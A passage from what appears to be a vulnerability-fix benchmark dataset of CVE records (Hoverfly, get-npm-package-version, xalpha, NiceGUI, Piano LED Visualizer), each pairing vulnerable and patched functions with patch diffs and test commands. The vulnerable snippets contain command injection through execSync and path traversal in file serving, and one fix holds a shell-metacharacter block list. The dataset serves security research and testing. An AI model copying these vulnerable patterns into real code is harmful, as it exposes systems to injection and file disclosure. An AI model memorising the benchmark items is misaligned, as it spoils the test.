ResolveAndValidatePath(basePath, relativePath string) (string, error) {\n+\tabsBasePath, err := filepath.Abs(basePath)\n+\tif err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to get absolute base path: %v\", err)\n+\t}\n+\n+\tcleanRelativePath := filepath.Clean(relativePath)\n+\n+\t// Check if the relative path starts with \"..\"\n+\tif strings.HasPrefix(cleanRelativePath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"relative path is invalid as it attempts to backtrack\")\n+\t}\n+\n+\tresolvedPath := filepath.Join(absBasePath, cleanRelativePath)\n+\n+\t// Verify that the resolved path is indeed a subpath of the base path\n+\tfinalPath, err := filepath.Rel(absBasePath, resolvedPath)\n+\tif err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to get relative path: %v\", err)\n+\t}\n+\n+\tif strings.HasPrefix(finalPath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"resolved path is outside the base path\")\n+\t}\n+\n+\treturn resolvedPath, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-45388:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/hoverfly\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestReadResponseBodyFile$ github.com/SpectoLabs/hoverfly/core\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-45388:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/hoverfly\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_Identical_ReturnsFalseWithDifferentArrayOfSameLength|Test_SortQueryString_ReordersQueryValuesAlphabetically|Test_MinifyJson_ErrorsOnInvalidJsonString|Test_GetContentTypeFromHeaders_ReturnsEmptyStringIfHeadersAreNil|Test_Contains_ReturnsFalseWithContainingNoneOfValuesSpecified|Test_SortQueryString_ReordersQueryValuesNumerically|Test_Identical_ReturnsTrue_WithExactlySameArray|Test_MinifyXml_SimplifiesXmlString|Test_GetResponseBody_GettingTheResponseBodySetsTheSameBodyAgain|Test_SortQueryString_KeepsAsteriskInTact|Test_SortQueryString_PreservesEqualsAndEmptyValueQuery|Test_MinifyJson_MinifiesJsonString|Test_ContainsOnly_ReturnsTrueWithIdenticalArray|Test_GetContentTypeFromHeaders_ReturnsXmlIfXml|Test_Contains_ReturnsTrueWithContainingOneOfValues|Test_SortQueryString_PreservesBothEqualsAndNoEqualsWithEmptyValue|Test_CopyMap|Test_Identical_ReturnsFalseWithDifferentArrayOfDifferentLength|Test_GetContentTypeFromHeaders_ReturnsJsonIfJson|Test_Contains_ReturnsTrueWithContainingBothValues|Test_ContainsOnly_ReturnsTrueWithArrayContainingOnlyValuesWithDups|Test_GetContentTypeFromHeaders_ReturnsEmptyStringIfHeadersAreEmpty|Test_ContainsOnly_ReturnsFalseWithEmptyArrayMatcher|Test_GetResponseBody_GettingTheResponseBodyGetsTheCorrectData|Test_JSONMarshal_MarshalsIntoJson|Test_GetRequestBody_GettingTheRequestBodySetsTheSameBodyAgain|Test_ContainsOnly_ReturnsTrueWithArrayInDifferentOrder|Test_GetRequestBody_GettingTheRequestBodyGetsTheCorrectData|Test_SortQueryString_PreservesNoEqualsAndEmptyValueQuery|Test_MinifyXml_MinifiesXmlString|Test_ContainsOnly_ReturnsTrueWithSubsetOfValues|Test_SortQueryString_ReordersQueryStringAlphabetically|Test_ContainsOnly_ReturnFalseWithOneExtraValue|Test_Contains_ReturnsFalseWithEmptyArrayMatcher|Test_SortQueryString_ReordersQueryValuesAlphanumerically|Test_GetRequestBody_DecompressGzipContent)$' github.com/SpectoLabs/hoverfly/core/util"} {"cve_id": "CVE-2020-7795", "cve_description": "The package get-npm-package-version before 1.0.7 are vulnerable to Command Injection via main function in index.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/hoperyy/get-npm-package-version", "patch_url": ["https://github.com/hoperyy/get-npm-package-version/commit/40b1cf31a0607ea66f9e30a0c3af1383b52b2dec", "https://github.com/hoperyy/get-npm-package-version/commit/49459d4a3ce68587d48ffa8dead86fc9ed58e965"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_16_1", "commit": "5279786", "file_path": "index.js", "start_line": 1, "end_line": 28, "snippet": "module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n let version;\n\n const config = {\n stdio: ['pipe', 'pipe', 'ignore']\n };\n\n if (timeout) {\n config.timeout = timeout;\n }\n\n if (registry) {\n version = require('child_process').execSync(`npm view ${packageName} version --registry ${registry}`, config);\n } else {\n version = require('child_process').execSync(`npm view ${packageName} version`, config);\n }\n\n if (version) {\n return version.toString().trim().replace(/^\\n*/, '').replace(/\\n*$/, '');\n } else {\n return null;\n }\n\n } catch(err) {\n return null;\n }\n}"}], "fix_func": [{"id": "fix_js_16_1", "commit": "40b1cf3", "file_path": "index.js", "start_line": 1, "end_line": 31, "snippet": "module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n if (/[`$&{}[;|]/g.test(packageName) || /[`$&{}[;|]/g.test(registry)) {\n return null\n }\n let version;\n\n const config = {\n stdio: ['pipe', 'pipe', 'ignore']\n };\n\n if (timeout) {\n config.timeout = timeout;\n }\n\n if (registry) {\n version = require('child_process').execSync(`npm view ${packageName} version --registry ${registry}`, config);\n } else {\n version = require('child_process').execSync(`npm view ${packageName} version`, config);\n }\n\n if (version) {\n return version.toString().trim().replace(/^\\n*/, '').replace(/\\n*$/, '');\n } else {\n return null;\n }\n\n } catch(err) {\n return null;\n }\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,5 +1,8 @@\n module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n+ if (/[`$&{}[;|]/g.test(packageName) || /[`$&{}[;|]/g.test(registry)) {\n+ return null\n+ }\n let version;\n \n const config = {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7795:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/get-npm-package-version\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7795:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/get-npm-package-version\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test"} {"cve_id": "CVE-2023-37659", "cve_description": "xalpha v0.11.4 is vulnerable to Remote Command Execution (RCE).", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/refraction-ray/xalpha", "patch_url": ["https://github.com/refraction-ray/xalpha/commit/6dceaa159a1a319d750ade20a4595956876657b6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_94_1", "commit": "06a161f", "file_path": "xalpha/info.py", "start_line": "521", "end_line": "568", "snippet": " def __init__(\n self,\n code,\n round_label=0,\n dividend_label=0,\n fetch=False,\n save=False,\n path=\"\",\n form=\"csv\",\n priceonly=False,\n ):\n if round_label == 1 or (code in droplist):\n label = 1 # the scheme of round down on share purchase\n else:\n label = 0\n if code.startswith(\"F\") and code[1:].isdigit():\n code = code[1:]\n elif code.startswith(\"M\") and code[1:].isdigit():\n raise FundTypeError(\n \"This code seems to be a mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n self._feeurl = (\n \"http://fund.eastmoney.com/f10/jjfl_\" + code + \".html\"\n ) # html url for trade fees info of certain fund\n self.priceonly = priceonly\n\n super().__init__(\n code,\n fetch=fetch,\n save=save,\n path=path,\n form=form,\n round_label=label,\n dividend_label=dividend_label,\n )\n\n self.special = self.price[self.price[\"comment\"] != 0]\n self.specialdate = list(self.special[\"date\"])\n # date with nonvanishing comment, usually fenhong or zhesuan\n try:\n self.fenhongdate = list(self.price[self.price[\"comment\"] > 0][\"date\"])\n self.zhesuandate = list(self.price[self.price[\"comment\"] < 0][\"date\"])\n except TypeError:\n print(\"There are still string comments for the fund!\")"}], "fix_func": [{"id": "fix_py_94_1", "commit": "6dceaa1", "file_path": "xalpha/info.py", "start_line": "521", "end_line": "570", "snippet": " def __init__(\n self,\n code,\n round_label=0,\n dividend_label=0,\n fetch=False,\n save=False,\n path=\"\",\n form=\"csv\",\n priceonly=False,\n ):\n if round_label == 1 or (code in droplist):\n label = 1 # the scheme of round down on share purchase\n else:\n label = 0\n if code.startswith(\"F\") and code[1:].isdigit():\n code = code[1:]\n elif code.startswith(\"M\") and code[1:].isdigit():\n raise FundTypeError(\n \"This code seems to be a mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n assert code.isdigit(), \"fund code must be a strin of six digits\"\n assert len(code) == 6, \"fund code must be a strin of six digits\"\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n self._feeurl = (\n \"http://fund.eastmoney.com/f10/jjfl_\" + code + \".html\"\n ) # html url for trade fees info of certain fund\n self.priceonly = priceonly\n\n super().__init__(\n code,\n fetch=fetch,\n save=save,\n path=path,\n form=form,\n round_label=label,\n dividend_label=dividend_label,\n )\n\n self.special = self.price[self.price[\"comment\"] != 0]\n self.specialdate = list(self.special[\"date\"])\n # date with nonvanishing comment, usually fenhong or zhesuan\n try:\n self.fenhongdate = list(self.price[self.price[\"comment\"] > 0][\"date\"])\n self.zhesuandate = list(self.price[self.price[\"comment\"] < 0][\"date\"])\n except TypeError:\n print(\"There are still string comments for the fund!\")"}], "vul_patch": "--- a/xalpha/info.py\n+++ b/xalpha/info.py\n@@ -20,6 +20,8 @@\n \"This code seems to be a mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n+ assert code.isdigit(), \"fund code must be a strin of six digits\"\n+ assert len(code) == 6, \"fund code must be a strin of six digits\"\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-32005", "cve_description": "NiceGUI is an easy-to-use, Python-based UI framework. A local file inclusion is present in the NiceUI leaflet component when requesting resource files under the `/_nicegui/{__version__}/resources/{key}/{path:path}` route. As a result any file on the backend filesystem which the web server has access to can be read by an attacker with access to the NiceUI leaflet website. This vulnerability has been addressed in version 1.4.21. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/zauberzeug/nicegui", "patch_url": ["https://github.com/zauberzeug/nicegui/commit/ed12eb14f2a6c48b388a05c04b3c5a107ea9d330"], "programing_language": "Python", "vul_func": [{"id": "vul_py_123_1", "commit": "7c3e01a", "file_path": "nicegui/nicegui.py", "start_line": 96, "end_line": 103, "snippet": "def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n if filepath.exists():\n headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n return FileResponse(filepath, media_type=media_type, headers=headers)\n raise HTTPException(status_code=404, detail=f'resource \"{key}\" not found')"}], "fix_func": [{"id": "fix_py_123_1", "commit": "ed12eb1", "file_path": "nicegui/nicegui.py", "start_line": 96, "end_line": 107, "snippet": "def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n try:\n filepath.resolve().relative_to(resources[key].path.resolve()) # NOTE: use is_relative_to() in Python 3.9\n except ValueError as e:\n raise HTTPException(status_code=403, detail='forbidden') from e\n if filepath.exists():\n headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n return FileResponse(filepath, media_type=media_type, headers=headers)\n raise HTTPException(status_code=404, detail=f'resource \"{key}\" not found')"}], "vul_patch": "--- a/nicegui/nicegui.py\n+++ b/nicegui/nicegui.py\n@@ -1,6 +1,10 @@\n def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n+ try:\n+ filepath.resolve().relative_to(resources[key].path.resolve()) # NOTE: use is_relative_to() in Python 3.9\n+ except ValueError as e:\n+ raise HTTPException(status_code=403, detail='forbidden') from e\n if filepath.exists():\n headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-24900", "cve_description": "Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Since the \"malicious\" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks. A patch with a fix is available on the `master` branch of the GitHub repository. This can also be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `flask.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/onlaj/Piano-LED-Visualizer", "patch_url": ["https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_105_1", "commit": "6a732ca", "file_path": "webinterface/views_api.py", "start_line": "145", "end_line": "1114", "snippet": "def change_setting():\n setting_name = request.args.get('setting_name')\n value = request.args.get('value')\n second_value = request.args.get('second_value')\n disable_sequence = request.args.get('disable_sequence')\n\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n if (disable_sequence == \"true\"):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n\n if setting_name == \"clean_ledstrip\":\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"led_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.color_mode = \"Single\"\n\n webinterface.ledsettings.red = rgb[0]\n webinterface.ledsettings.green = rgb[1]\n webinterface.ledsettings.blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n webinterface.usersettings.change_setting_value(\"red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"light_mode\":\n webinterface.ledsettings.mode = value\n webinterface.usersettings.change_setting_value(\"mode\", value)\n\n if setting_name == \"fading_speed\" or setting_name == \"velocity_speed\":\n webinterface.ledsettings.fadingspeed = int(value)\n webinterface.usersettings.change_setting_value(\"fadingspeed\", webinterface.ledsettings.fadingspeed)\n\n if setting_name == \"brightness\":\n webinterface.usersettings.change_setting_value(\"brightness_percent\", int(value))\n webinterface.ledstrip.change_brightness(int(value), True)\n\n if setting_name == \"backlight_brightness\":\n webinterface.ledsettings.backlight_brightness_percent = int(value)\n webinterface.ledsettings.backlight_brightness = 255 * webinterface.ledsettings.backlight_brightness_percent / 100\n webinterface.usersettings.change_setting_value(\"backlight_brightness\",\n int(webinterface.ledsettings.backlight_brightness))\n webinterface.usersettings.change_setting_value(\"backlight_brightness_percent\",\n webinterface.ledsettings.backlight_brightness_percent)\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"backlight_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.backlight_red = rgb[0]\n webinterface.ledsettings.backlight_green = rgb[1]\n webinterface.ledsettings.backlight_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"backlight_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"backlight_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"backlight_blue\", rgb[2])\n\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"sides_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.adjacent_red = rgb[0]\n webinterface.ledsettings.adjacent_green = rgb[1]\n webinterface.ledsettings.adjacent_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"adjacent_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"adjacent_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"adjacent_blue\", rgb[2])\n\n if setting_name == \"sides_color_mode\":\n webinterface.ledsettings.adjacent_mode = value\n webinterface.usersettings.change_setting_value(\"adjacent_mode\", value)\n\n if setting_name == \"input_port\":\n webinterface.usersettings.change_setting_value(\"input_port\", value)\n webinterface.midiports.change_port(\"inport\", value)\n\n if setting_name == \"secondary_input_port\":\n webinterface.usersettings.change_setting_value(\"secondary_input_port\", value)\n\n if setting_name == \"play_port\":\n webinterface.usersettings.change_setting_value(\"play_port\", value)\n webinterface.midiports.change_port(\"playport\", value)\n\n if setting_name == \"skipped_notes\":\n webinterface.usersettings.change_setting_value(\"skipped_notes\", value)\n webinterface.ledsettings.skipped_notes = value\n\n if setting_name == \"add_note_offset\":\n webinterface.ledsettings.add_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"append_note_offset\":\n webinterface.ledsettings.append_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"remove_note_offset\":\n webinterface.ledsettings.del_note_offset(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"note_offsets\":\n webinterface.usersettings.change_setting_value(\"note_offsets\", value)\n\n if setting_name == \"update_note_offset\":\n webinterface.ledsettings.update_note_offset(int(value) + 1, second_value)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"led_count\":\n webinterface.usersettings.change_setting_value(\"led_count\", int(value))\n webinterface.ledstrip.change_led_count(int(value), True)\n\n if setting_name == \"shift\":\n webinterface.usersettings.change_setting_value(\"shift\", int(value))\n webinterface.ledstrip.change_shift(int(value), True)\n\n if setting_name == \"reverse\":\n webinterface.usersettings.change_setting_value(\"reverse\", int(value))\n webinterface.ledstrip.change_reverse(int(value), True)\n\n if setting_name == \"color_mode\":\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n webinterface.ledsettings.color_mode = value\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_multicolor\":\n webinterface.ledsettings.addcolor()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"add_multicolor_and_set_value\":\n settings = json.loads(value)\n\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n for key, value in settings.items():\n rgb = wc.hex_to_rgb(\"#\" + value[\"color\"])\n\n webinterface.ledsettings.multicolor.append([int(rgb[0]), int(rgb[1]), int(rgb[2])])\n webinterface.ledsettings.multicolor_range.append([int(value[\"range\"][0]), int(value[\"range\"][1])])\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\",\n webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True)\n\n if setting_name == \"remove_multicolor\":\n webinterface.ledsettings.deletecolor(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"multicolor\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.multicolor[int(second_value)][0] = rgb[0]\n webinterface.ledsettings.multicolor[int(second_value)][1] = rgb[1]\n webinterface.ledsettings.multicolor[int(second_value)][2] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_left\":\n webinterface.ledsettings.multicolor_range[int(second_value)][0] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_right\":\n webinterface.ledsettings.multicolor_range[int(second_value)][1] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_all_multicolors\":\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n return jsonify(success=True)\n\n if setting_name == \"rainbow_offset\":\n webinterface.ledsettings.rainbow_offset = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_offset\",\n int(webinterface.ledsettings.rainbow_offset))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_scale\":\n webinterface.ledsettings.rainbow_scale = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_scale\",\n int(webinterface.ledsettings.rainbow_scale))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_timeshift\":\n webinterface.ledsettings.rainbow_timeshift = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_timeshift\",\n int(webinterface.ledsettings.rainbow_timeshift))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_slowest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_slowest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_slowest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_slowest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_slowest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_slowest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_slowest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_fastest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_fastest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_fastest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_fastest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_fastest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_fastest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_fastest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_start_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_start[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_start[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_start[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_start_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_start_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_start_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_end_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_end[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_end[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_end[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_end_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_end_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_end_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_max_notes\":\n webinterface.ledsettings.speed_max_notes = int(value)\n webinterface.usersettings.change_setting_value(\"speed_max_notes\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_period_in_seconds\":\n webinterface.ledsettings.speed_period_in_seconds = float(value)\n webinterface.usersettings.change_setting_value(\"speed_period_in_seconds\", float(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_not_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_not_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_not_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_not_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"scale_key\":\n webinterface.ledsettings.scale_key = int(value)\n webinterface.usersettings.change_setting_value(\"scale_key\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"next_step\":\n webinterface.ledsettings.set_sequence(0, 1, False)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"set_sequence\":\n if (int(value) == 0):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n else:\n webinterface.ledsettings.set_sequence(int(value) - 1, 0)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_sequence_name\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"sequence_name\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_value\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"next_step\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_activation_method\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"control_number\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n sequences_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(sequences_amount))) == 0):\n break\n sequences_amount += 1\n\n settings = sequences_tree.createElement(\"settings\")\n\n control_number = sequences_tree.createElement(\"control_number\")\n control_number.appendChild(sequences_tree.createTextNode(\"0\"))\n settings.appendChild(control_number)\n\n next_step = sequences_tree.createElement(\"next_step\")\n next_step.appendChild(sequences_tree.createTextNode(\"1\"))\n settings.appendChild(next_step)\n\n sequence_name = 